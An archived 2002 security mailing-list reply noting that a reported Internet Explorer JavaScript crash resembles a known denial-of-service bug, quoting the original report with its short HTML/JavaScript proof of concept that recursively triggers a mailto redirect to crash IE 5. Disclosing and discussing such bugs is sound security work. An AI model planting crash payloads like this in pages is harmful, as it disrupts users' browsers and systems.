RE: Buffer Overflow with all versions of Internet Explorer and Ja vacript.

From: Patrik Birgersson (floatat_private)
Date: Mon Jun 03 2002 - 14:17:33 PDT

  • Next message: Blue Boar: "Re: Buffer Overflow with all versions of Internet Explorer and Javacript."

    This seems quite familiar to the "Multiple Vendor JavaScript Interpreter
    Denial Of Service Vulnerability" reported to Bugtraq in march.
    http://online.securityfocus.com/bid/4322
    
    
    Patrik Birgersson
    
    > -----Original Message-----
    > From: Matias Sedalo [mailto:s0t4ipv6at_private]
    > Sent: 2. juni 2002 23:08
    > To: vuln-devat_private
    > Subject: Buffer Overflow with all versions of Internet Explorer and
    > Javacript.
    >
    >
    > the 28/07/1999 I have discovered a stack buffer overflow caused by until
    > the moment all the versions of the Internet Explorer.
    > In many windows98 causes the necessity to reinitiate the equipment, since
    > to my to seem it remains without memory.
    > Only it has been proven in several versions 5 of IE on WindowsNT
    > server sp6 and windows98 Second Edition.  As I said before the Windows 98
    > I had to reinitiate it to the force.
    > Can be possible to execute arbitrary code using the variable company of
    > the example?
    >
    > // internet Explorer 5.00.2314.1003 on WindowsNT 4 sp6
    > // internet Explorer 5.00.3500.1003 on Windows98se
    >
    > -----------cut here---------------------------
    > <html><head></head>
    > <script language="JAVASCRIPT">
    > function hacerMail() {
    >   var company;
    >
    >   crear();
    >   address="s0t4ipv6at_private";
    >   soporte();
    > }
    > function soporte(){
    >   var soporte="billat_private";
    >   window.location="mailto:"+address+"?cc="+soporte+"&subject="+company;
    > // window.location=company;             // also this line cause the bof.
    >   close(hacerMail());
    > }
    > function crear(){
    > company="shellcode here?\n";            // i don't think so.
    > }
    > </script>
    >   <input type="button" onClick="hacerMail();" value="SMASH!"></input>
    > </html>
    > -----------cut here---------------------------
    >
    > Regards.
    >
    > - Internet es perjudicial para la salud -
    > - Ley N~ 127.0.0.1
    >
    > Matias Sedalo
    > http://www.shellcode.com.ar
    >
    > s0t4ipv6at_private
    > B7A1 B45E 4906 34BD 70A1 55F8 E5A0 BCA2
    > ........................................
    



    This archive was generated by hypermail 2b30 : Mon Jun 03 2002 - 14:33:56 PDT